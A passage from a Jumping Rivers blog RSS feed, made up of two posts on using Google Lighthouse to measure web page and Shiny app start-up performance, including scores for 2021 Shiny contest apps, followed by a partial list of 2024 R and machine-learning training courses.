For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-3/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Analysing Shiny App start-up Times with Google Lighthouse</title><link>https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-2/</link><pubDate>Thu, 07 Dec 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-2/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-2/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-2/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part one of a three part series on Lighthouse for Shiny Apps.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: &lt;a href="https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-1/" rel="external"&gt;Using Google Lighthouse for Web Pages&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 2: Analysing Shiny App start-up Times with Google Lighthouse (This post)&lt;/li&gt;
&lt;li&gt;Part 3: &lt;a href="https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-3/" rel="external"&gt;Effect of Shiny Widgets with Google Lighthouse&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="intro"&gt;Intro&lt;/h3&gt;
&lt;p&gt;In the last blog I spoke about using &lt;a href="https://developer.chrome.com/docs/lighthouse/overview/" rel="external"&gt;Google Lighthouse&lt;/a&gt; to test the speed of web pages. I wanted to build upon that and use Lighthouse to test some Shiny apps.&lt;/p&gt;
&lt;p&gt;To get a feel for Shiny&amp;rsquo;s performance in a Lighthouse analysis, I needed a lot of shiny
apps that I could test and create a dataset from, so I used the entries to the
&lt;a href="https://posit.co/blog/time-to-shiny/" rel="external"&gt;2021 Shiny app contest&lt;/a&gt;,
which is a competition where people enter Shiny apps to be judged on technical merit
and artistic achievement. I used the 2021 apps as there has unfortunately not been a
competition since. A full list of the submissions can be found on the
&lt;a href="https://community.rstudio.com/tags/c/shiny/shiny-contest/30/shiny-contest-2021" rel="external"&gt;Posit Community website&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;To actually obtain data from these apps I used
&lt;a href="https://developer.chrome.com/docs/lighthouse/overview/" rel="external"&gt;Google Lighthouse&lt;/a&gt; in the
same way I described for general web pages in the &lt;a href="https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-1/" rel="external"&gt;previous blog&lt;/a&gt; in this series. This
generated a Lighthouse report for each app.&lt;/p&gt;
&lt;h3 id="google-lighthouse"&gt;Google Lighthouse&lt;/h3&gt;
&lt;p&gt;To test a singular app from the contest it was exactly the same as testing a normal webpage, I simply ran:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;lighthouse --output json --output-path data/output_file.json url
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Where &lt;code&gt;url&lt;/code&gt; is the app I&amp;rsquo;m testing. You can also test in browser using devtools
(as demonstrated in the last blog), but I was testing a lot of apps so I needed to do it programmatically.&lt;/p&gt;
&lt;p&gt;Before we get into the data it&amp;rsquo;s important to point out that Google Lighthouse scores do vary; you may run a report on an app that I&amp;rsquo;ve covered and get a different score. There are a number of reasons for this &lt;a href="https://developer.chrome.com/en/docs/lighthouse/performance/performance-scoring/#fluctuations" rel="external"&gt;covered here&lt;/a&gt;, so the devs recommend running multiple tests. I&amp;rsquo;d also like to point out I have only run the report once for each app due to length of time it would take to run reports on all the apps a few times.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-shiny-contest"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="app-data"&gt;App data&lt;/h3&gt;
&lt;p&gt;The entries to the 2021 Shiny app contest were great! Loads of unique and interesting apps,
given it was 2021 there were plenty of COVID- and election-related apps. I ran Lighthouse reports locally on
268 of the Shiny app contest submissions (some of the links were broken), and have compiled a few
plots to summarise the performance of the apps.&lt;/p&gt;
&lt;p&gt;Below is a histogram showing the distribution of overall performance scores for the
apps. The Lighthouse docs give the following advice for apps based on performance scores:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;90-100 is an app with good performance;&lt;/li&gt;
&lt;li&gt;50-89 is an app that needs some improvement;&lt;/li&gt;
&lt;li&gt;and 0-49 is an app with poor performance.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;As we can see many of the apps (79 / 268) have good performance, whereas the bulk of the apps are in need of some improvement (149 / 268) or have poor overall performance (40 / 268).&lt;/p&gt;
&lt;img src="images/score_hist.png" alt="Distribution of overall scores for the apps, with the mean score of 73.2 marked." style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;We can dive deeper into the distribution of the raw values that are used in
calculating the overall performance score. The performance score is a weighted sum
of some metrics formed from these raw (time) values - see the
&lt;a href="https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-1/" rel="external"&gt;previous blog&lt;/a&gt; for
more details on what each of these metrics means. The scores follow a similar
trend - most of the measurements fall on the faster side of the spectrum then
decrease as the time increases. I think this was to be expected based on the
distribution of the performance score seen earlier, as most of the apps scored
pretty well.&lt;/p&gt;
&lt;img src="images/metrics.png" alt="App metric scores for six different metrics: Cumulative Layout Shift, First Contentful Paint, Largest Contentful Paint, Speed Index, Time to Interactive, Total Blocking Time. The plots are histograms of the time taken to each stage." style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;h3 id="the-apps"&gt;The Apps&lt;/h3&gt;
&lt;p&gt;I don&amp;rsquo;t highlight any of the apps on the lower end of the performance spectrum here, as
it would be unfair on the creators. The Shiny app contest has two sections one for &amp;lt; 1
year&amp;rsquo;s experience and another for &amp;gt; 1 years experience, so people new to Shiny are
likely to have been experimenting with what&amp;rsquo;s possible in an app and not focusing on
performance.&lt;/p&gt;
&lt;p&gt;That being said I&amp;rsquo;d like to reiterate what Colin Fay said in his talk &lt;a href="https://www.youtube.com/watch?v=8_k-iPwcleU" rel="external"&gt;&amp;ldquo;Destroy All Widgets&amp;rdquo;&lt;/a&gt;
about being sensible with widget use within apps, and understanding that they can hinder performance and increase wait times when they are
not always necessary. For instance do you really need a {plotly} plot or would a ggplot suffice? The same could be said about interactive data tables.&lt;/p&gt;
&lt;p&gt;I will highlight a couple of high scoring apps:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://rabiibouhestine.shinyapps.io/wonderguesser/" rel="external"&gt;This app&lt;/a&gt; by Rabii Bouhestine is a really cool Geoguessr-esque game where you are trying to pinpoint the location of world wonders. This app received the overall score from Lighthouse of 95!&lt;/p&gt;
&lt;img src="images/guesser.png" alt="WorldGuesser app screenshot" style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;Another high scoring app is &lt;a href="https://parmsam.shinyapps.io/MixThingsUp/" rel="external"&gt;&amp;ldquo;Mix Things Up&amp;rdquo; by Sam Parmar&lt;/a&gt;
a previous competition winner who was a judge on the 2021 contest. This app is a simple yet efficient
way to generate random work outs.&lt;/p&gt;
&lt;img src="images/exercise.png" alt="Exercise app screenshot" style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;The last one I&amp;rsquo;m going to highlight is
&lt;a href="https://desarrolloaplicaciones.shinyapps.io/videowall_english_version/" rel="external"&gt;this app&lt;/a&gt; by
Edgar Cáceres, which is an app for visualising air quality data from the station in La
Oroya, Junin, Peru. This app is particularly impressive in it&amp;rsquo;s scores as it actually
has two interactive {leaflet} plots.&lt;/p&gt;
&lt;img src="images/air_qual.png" alt="Air quality app screenshot" style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;Google Lighthouse is a good starting point for testing the start-up times of your apps, however it is worth noting that the score can be misleading.
An app may score very highly but not actually load fast for the user. This may happen, for example, if Lighthouse thinks that the contentful
paints have loaded when it was the background for the app. A way to check this is looking at the screenshots of the Google Lighthouse report
within the browser. You can do this by adding &lt;code&gt;--view&lt;/code&gt; after the &lt;code&gt;url&lt;/code&gt; argument when running a test in the terminal. I will be using the next
blog in this series to investigate this further.&lt;/p&gt;
&lt;p&gt;So if you are developing a desktop Shiny app and want see see how it does you can use Lighthouse and this blog for a benchmark, although with a pinch of salt as there are many different kinds of apps that we tested - games and data visualations etc. Roughly, however, if your app scores better than 73 then that&amp;rsquo;s a good start. If you can&amp;rsquo;t bring your app load time down for whatever reason, maybe due data processing for example, then something you can do is use a loading screen to let your app-users know that something is happening. This is covered excellently at the start of this &lt;a href="https://www.jumpingrivers.com/blog/r-shiny-extensions-ui/" rel="external"&gt;blog on Shiny extensions&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;In the final blog in this series, we will be investigating the impact various widgets have on Shiny app Lighthouse scores.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-2/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Using Google Lighthouse for Web Pages</title><link>https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-1/</link><pubDate>Thu, 30 Nov 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-1/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-1/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-1/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part one of a three part series on Lighthouse for Shiny Apps.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: Using Google Lighthouse for Web Pages (This post)&lt;/li&gt;
&lt;li&gt;Part 2: &lt;a href="https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-2/" rel="external"&gt;Analysing Shiny App start-up Times with Google Lighthouse&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 3: &lt;a href="https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-3/" rel="external"&gt;Effect of Shiny Widgets with Google Lighthouse&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="intro"&gt;Intro&lt;/h3&gt;
&lt;p&gt;This blog post was partly inspired by
&lt;a href="https://www.youtube.com/watch?v=8_k-iPwcleU" rel="external"&gt;Colin Fay&amp;rsquo;s talk &amp;ldquo;Destroy All Widgets&amp;rdquo;&lt;/a&gt; at our
&amp;ldquo;Shiny In Production&amp;rdquo; conference in 2022. In that talk, Colin spoke about HTML widgets and
highlighted how detrimental they can be to the speed of a Shiny app. Speaking of which, the next
&lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;Shiny In Production&lt;/a&gt; conference is taking place
on 9th and 10th of October 2024, and recordings for this year&amp;rsquo;s events are coming soon to our
&lt;a href="https://youtube.com/@jumping-rivers?si=DI-JS2Zf5gVsyMsS" rel="external"&gt;YouTube channel&lt;/a&gt;.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Join us for the next installment of our Shiny in Production conference! For more details, check out our
&lt;a href="https://shiny-in-production.jumpingrivers.com/"&gt;conference website!&lt;/a&gt;
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;I wanted to see if I could measure the speed of a collection of shiny apps. To do so, I was directed to
&lt;a href="https://developer.chrome.com/docs/lighthouse/overview/" rel="external"&gt;Google Lighthouse&lt;/a&gt;, and this
blog is dedicated to the use and understanding of lighthouse before I start using it on Shiny Apps.&lt;/p&gt;
&lt;h3 id="google-lighthouse"&gt;Google Lighthouse&lt;/h3&gt;
&lt;p&gt;Google Lighthouse is an open source tool which can be used to test webpages (or web hosted apps
like Shiny apps). For a specified webpage, Lighthouse generates a report summarising several
aspects of that webpage. For Shiny, the most important aspects are summarised in the &amp;ldquo;Overall
Performance Score&amp;rdquo; and the &amp;ldquo;Accessibility Score&amp;rdquo;, with one of the best parts being the feedback given
by the report on how you can improve.&lt;/p&gt;
&lt;p&gt;Before you can use Lighthouse you must install it (and
&lt;a href="https://docs.npmjs.com/downloading-and-installing-node-js-and-npm" rel="external"&gt;npm&lt;/a&gt; if you don&amp;rsquo;t already have it):&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;npm install -g lighthouse
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Then to run a Google Lighthouse assessment in the command line you simply run:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;lighthouse --output json --output-path data/output_file.json url
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Where you specify:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;the &lt;em&gt;&lt;strong&gt;output format&lt;/strong&gt;&lt;/em&gt;, either json and csv are available, I used json as more information is stored.&lt;/li&gt;
&lt;li&gt;The &lt;em&gt;&lt;strong&gt;output path&lt;/strong&gt;&lt;/em&gt; for where you would like the data to be stored.&lt;/li&gt;
&lt;li&gt;The &lt;em&gt;&lt;strong&gt;url&lt;/strong&gt;&lt;/em&gt; of the Shiny app you would like to test (the location of your deployed app
or, if developing locally, the URL that Shiny prints out when the app starts:
&lt;code&gt;Listening on http://127.0.0.1:4780&lt;/code&gt;).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;One cool feature of Lighthouse is that you can test apps in both desktop and mobile settings. The
default is mobile but you can specify desktop by adding &lt;code&gt;--preset desktop&lt;/code&gt; after the url argument.&lt;/p&gt;
&lt;p&gt;When you run the command a new Chrome browser will open with the specified URL, where Lighthouse
will run the report. This browser will automatically be closed by Lighthouse when it is finished.
For all the Lighthouse demos in this blog I am going to use
&lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;our website&lt;/a&gt; for consistency.&lt;/p&gt;
&lt;p&gt;Another way to access Lighthouse is to simply use it in a Chrome browser and open the DevTools panel,
as described in the
&lt;a href="https://developer.chrome.com/docs/lighthouse/overview/#devtools" rel="external"&gt;Chrome Developer documentation&lt;/a&gt;.
A Lighthouse tab should be visible in the &amp;ldquo;more tabs&amp;rdquo; section, where you can run performance checks interactively.&lt;/p&gt;
&lt;img src="images/lighthouse_devtools.png" alt="Lighthouse in browser. The image is a screenshot of the dev tools panel with the title 'Generate a Lighthouse report' and a button to 'Analyze page load', followed by some radio buttons to select different options, including whether you want to test for mobile or desktop devices - mobile is selected by default." style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;From DevTools all you do is tick the boxes to specify the device type and performance metrics you want to assess. Then press &amp;ldquo;Analyze page load&amp;rdquo; to start the Lighthouse report generation.&lt;/p&gt;
&lt;h3 id="lighthouse-output"&gt;Lighthouse Output&lt;/h3&gt;
&lt;p&gt;Depending on how you&amp;rsquo;ve run the Lighthouse report, the way you access the results will be different. Firstly if you have used the terminal and saved the lighthouse output you will have a csv or json file containing the data displayed in the report (json output contains more in depth data).&lt;/p&gt;
&lt;p&gt;Alternatively from the terminal you can add &lt;code&gt;--view&lt;/code&gt; after the URL and the Lighthouse report will open in your browser to view it when ready. Here is an example of this:&lt;/p&gt;
&lt;img src="images/jumpingviewrivers.png" alt="Lighthouse report in browser. The page shows four metrics at the top and their scores out of 100. Performance: 100, Accessibility: 100, Best Practices: 92, SEO: 100, PWA: No score shown. This is followed by a list of detailed metrics and a view of the page in question." style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;Lastly, if you have run Lighthouse through DevTools in a Chrome browser, the report will become
visible in the DevTools panel. Location aside, the report should look identical to the browser
version created with the &lt;code&gt;--view&lt;/code&gt; option. It should look similar to this:&lt;/p&gt;
&lt;img src="images/devtoolsresults.png" alt="Lighthouse report in browser. The same report as above is shown in the dev tools window split with the page in question. This time the metrics are as follows: Performance: 100, Accessibility: 96, Best Practices: 100, SEO: 100, PWA: No score shown." style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;You may have noticed that I have got different scores in the separate screenshots even though I am using the same URL for both. This gives me a great opportunity to bring up one of the drawbacks of Lighthouse, and that is the variability in results. For example you could run a test on our website and get a different score. There are a number of reasons for this including internet or device performance and browser extensions, so the Lighthouse developers recommend running multiple tests. This topic is covered in more detail &lt;a href="https://developer.chrome.com/en/docs/lighthouse/performance/performance-scoring/#fluctuations" rel="external"&gt;here.&lt;/a&gt;&lt;/p&gt;
&lt;h3 id="lighthouse-performance-metrics"&gt;Lighthouse Performance Metrics&lt;/h3&gt;
&lt;p&gt;Lighthouse scores apps on 5 measures: Performance, Accessibility, Best Practices,
SEO (search engine optimization) and PWA (progressive web app).&lt;/p&gt;
&lt;p&gt;Here, we will look at the overall performance score. This is based on a weighted combination of
several different metrics. As of Lighthouse 10 (8 was slightly different) the score is made up of:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;10% First Contentful Paint - This is the time from the page starting to any part of the page&amp;rsquo;s content is rendered on the screen. &amp;ldquo;Content&amp;rdquo; can be text, images, &amp;lt;svg&amp;gt; elements or non-white &amp;lt;canvas&amp;gt; elements.&lt;/li&gt;
&lt;li&gt;10% Speed Index - This is how quickly the contents of a page are visibly populated.&lt;/li&gt;
&lt;li&gt;25% Largest Contentful Paint - This metric is the time between the page starting and the largest visible image or text block loading.&lt;/li&gt;
&lt;li&gt;30% Total Blocking Time - This is the time between first contentful paint and another metric called time to interactive, which measures how long the app takes to become interactive for the user.&lt;/li&gt;
&lt;li&gt;25% Cumulative Layout Shift - This is measure of the largest layout shift which occurs during the lifespan of a page, a good explanation can be found &lt;a href="https://web.dev/cls/" rel="external"&gt;here&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Performance scores lie in a range between 0 (worst) and 100 (best).&lt;/p&gt;
&lt;h3 id="lighthouse-performance-suggestions"&gt;Lighthouse Performance Suggestions&lt;/h3&gt;
&lt;p&gt;Another cool feature of Google Lighthouse is the performance improvement suggestions. I am going to use the &lt;a href="https://www.surfline.com/" rel="external"&gt;Surfline website&lt;/a&gt; as an example for this section. These suggestions can be found underneath the performance score on the report and should look similar to the image below.&lt;/p&gt;
&lt;img src="images/surfline.png" alt="A report page as in the above images is shown, this time for a different webpage. The scores here are as follows: 74, 81, 83, 100. Below is a section called Opportunities, which lists ways in which the score can be improved, and estimated loading time savings." style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;For each suggestion you have the ability to expand for more information along with the visible estimated time savings from implementing the suggestion. These suggestions can be helpful if you want to improve a particular aspect of your website or just generally streamline it.&lt;/p&gt;
&lt;p&gt;This was an overview of Google Lighthouse covering the many ways to run reports on web pages and some guidelines for interpreting Lighthouse reports. We can also use it to analyse Shiny applications, which will be covered in the next installment of this blog series.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-1/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Training Lineup for 2024: January-June</title><link>https://www.jumpingrivers.com/blog/training-lineup-2024-r-python-bayesian-statistics-machine-learning/</link><pubDate>Tue, 28 Nov 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/training-lineup-2024-r-python-bayesian-statistics-machine-learning/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/training-lineup-2024-r-python-bayesian-statistics-machine-learning/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/training-lineup-2024-r-python-bayesian-statistics-machine-learning/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;All of our public training courses for the first half of 2024 are now open for registration! Head over to the &lt;a href="https://www.jumpingrivers.com/training/public/" rel="external"&gt;public courses page&lt;/a&gt; on our website to book in and start building your programming skills in the new year! Below is a list of all of our upcoming courses with a description, upcoming dates, course level and a link to the page to find out more!&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-training-lineup-for-2024"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;!-- This is where the ad goes! Just use the name of the shortcode file. --&gt;&lt;/p&gt;
&lt;h3 id="r"&gt;R&lt;/h3&gt;
&lt;h4 id="introduction-to-r"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-tidyverse-readr-ggplot2-dplyr/" rel="external"&gt;Introduction to R&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Foundation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 15th January 2024 &amp;amp; 22nd April 2024&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;R is a versatile language for statistical computing and graphics. In &lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-tidyverse-readr-ggplot2-dplyr/" rel="external"&gt;this course&lt;/a&gt; you will learn the advantages of using R and how to get started. You will gain familiarity with the RStudio interface and learn the R basics. Also included is an introduction to the Tidyverse and how to use various packages for data storage, visualisation and manipulation. This course provides a great foundation to begin your R journey!&lt;/p&gt;
&lt;h4 id="data-wrangling-in-the-tidyverse"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/data-tidyverse-dplyr-tidyr-lubridate-forcats/" rel="external"&gt;Data Wrangling in the Tidyverse&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Foundation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 22nd January 2024 &amp;amp; 29th April 2024&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;If you work with data, you probably spend a lot of time cleaning it and wrangling it into the correct shape. &lt;a href="https://www.jumpingrivers.com/training/course/data-tidyverse-dplyr-tidyr-lubridate-forcats/" rel="external"&gt;This course&lt;/a&gt; will show you how you can use R to efficiently clean and wrangle your data into a format that’s ready for analysis. You will learn about the Tidyverse, what tidy data really is, and how to practically achieve it with packages such as {dplyr}, {tidyr}, {lubridate} and {forcats}.&lt;/p&gt;
&lt;h4 id="programming-with-r"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-programming-functions-looping-conditionals/" rel="external"&gt;Programming with R&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 29th January 2024 &amp;amp; 20th May 2024&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The benefit of using a programming language such as R is that we can automate repetitive tasks. &lt;a href="https://www.jumpingrivers.com/training/course/r-programming-functions-looping-conditionals/" rel="external"&gt;This course&lt;/a&gt; covers the fundamental techniques such as functions, for loops and conditional expressions. By the end of this course, you will understand what these techniques are and when to use them. This is a one-day intensive course on R.&lt;/p&gt;
&lt;h4 id="r-best-practices"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-best-practices/" rel="external"&gt;R Best Practices&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 12th February 2024&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;So you can write code? Great. But can you write code which is easy to read, simple to maintain, and reproducible? Under the pressure of deadlines even the best of us can fall victim to bad-practices. In &lt;a href="https://www.jumpingrivers.com/training/course/r-best-practices/" rel="external"&gt;this course&lt;/a&gt; we motivate the importance of good-practices, and show how we can make best practices second nature by incorporating them into our normal workflow.&lt;/p&gt;
&lt;h4 id="data-visualisation-with-ggplot2"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-advanced-graphics-ggplot2-plotly-themes-scaling-faceting/" rel="external"&gt;Data Visualisation with ggplot2&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 5th February 2024 &amp;amp; 10th June 2024&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Want to learn how to effectively visualise your data in R using the elegant {ggplot2} package? With {ggplot2} it’s easy to customise everything from plot layouts and themes to scales, colours, and more! &lt;a href="https://www.jumpingrivers.com/training/course/r-advanced-graphics-ggplot2-plotly-themes-scaling-faceting/" rel="external"&gt;This course&lt;/a&gt; will comprehensively take you through basic plot types such as bar and line charts as well as cover more advanced topics such as interactive graphics with {plotly}.&lt;/p&gt;
&lt;h4 id="statistical-modelling-with-r"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-statistics-modelling-linear-regression-clustering/" rel="external"&gt;Statistical Modelling with R&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 26th February 2024 &amp;amp; 3rd June 2024&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;From the very beginning, R was designed for statistical modelling. Out of the box, R makes standard statistical techniques easy. &lt;a href="https://www.jumpingrivers.com/training/course/r-statistics-modelling-linear-regression-clustering/" rel="external"&gt;This course&lt;/a&gt; covers the fundamental modelling techniques. We begin the day by revising hypotheses tests, before moving onto ANOVA tables and regression analysis. The class ends by looking at more sophisticated methods such as clustering and principal components analysis (PCA).&lt;/p&gt;
&lt;img src="r-lecture.jpg" alt="CUSP London logo" style="width: 800px; display: block; margin-left: auto; margin-right: auto; margin-top: 50px"/&gt;
&lt;hr&gt;
&lt;h3 id="machine-learning"&gt;Machine Learning&lt;/h3&gt;
&lt;h4 id="machine-learning-with-tidymodels"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-prediction-inference-analytics-machine-learning-tidymodels/" rel="external"&gt;Machine Learning with Tidymodels&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 4th March 2024 &amp;amp; 17th June 2024&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Machine learning is the process of applying statistical techniques to gain systematic information about a quantity of interest. We will be &lt;a href="https://www.jumpingrivers.com/training/course/r-prediction-inference-analytics-machine-learning-tidymodels/" rel="external"&gt;specifically focusing on&lt;/a&gt; how we can use the {tidymodels} suite of packages to implement these techniques. We cover key reasons for model fitting, such as prediction and inference, on quantitative and qualitative responses.&lt;/p&gt;
&lt;h4 id="advanced-machine-learning-with-tidymodels"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-prediction-inference-tidymodels-lda-pre-processing-tree-based-models/" rel="external"&gt;Advanced Machine Learning with Tidymodels&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Advanced&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 18th March 2024 &amp;amp; 24th June 2024&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;A course that builds on the material covered in our Machine Learning with Tidymodels course. We take a look at how we can fit linear discriminant analysis (LDA) models using {discrim}, assessing model reliability using V-fold cross validation, pre-processing, tree-based models &amp;amp; more. If you wish to explore the abundance of model fitting techniques {tidymodels} has to offer, then &lt;a href="https://www.jumpingrivers.com/training/course/r-prediction-inference-tidymodels-lda-pre-processing-tree-based-models/" rel="external"&gt;this course&lt;/a&gt; is certainly for you!&lt;/p&gt;
&lt;img src="full-image.jpg" alt="CUSP London logo" style="width: 800px; display: block; margin-left: auto; margin-right: auto; margin-top: 50px"/&gt;
&lt;hr&gt;
&lt;h3 id="automatic-reporting"&gt;Automatic Reporting&lt;/h3&gt;
&lt;h4 id="reporting-with-quarto"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/reporting-with-quarto/" rel="external"&gt;Reporting with Quarto&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 25th March 2024 &amp;amp; 24th June 2024&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Do you create interactive documents that always need to be updated when the data changes? Then &lt;a href="https://www.jumpingrivers.com/training/course/reporting-with-quarto/" rel="external"&gt;this course&lt;/a&gt; is for you. In this course you will learn how to use Quarto to create high quality, dynamic, fully reproducible documents. Quarto is a multi-language open source publishing tool that allows for the creation of dynamic content with Python, R, Julia and Observable.&lt;/p&gt;
&lt;img src="reporting.jpg" alt="CUSP London logo" style="width: 500px; display: block; margin-left: auto; margin-right: auto; margin-top: 50px"/&gt;
&lt;hr&gt;
&lt;h3 id="statistics"&gt;Statistics&lt;/h3&gt;
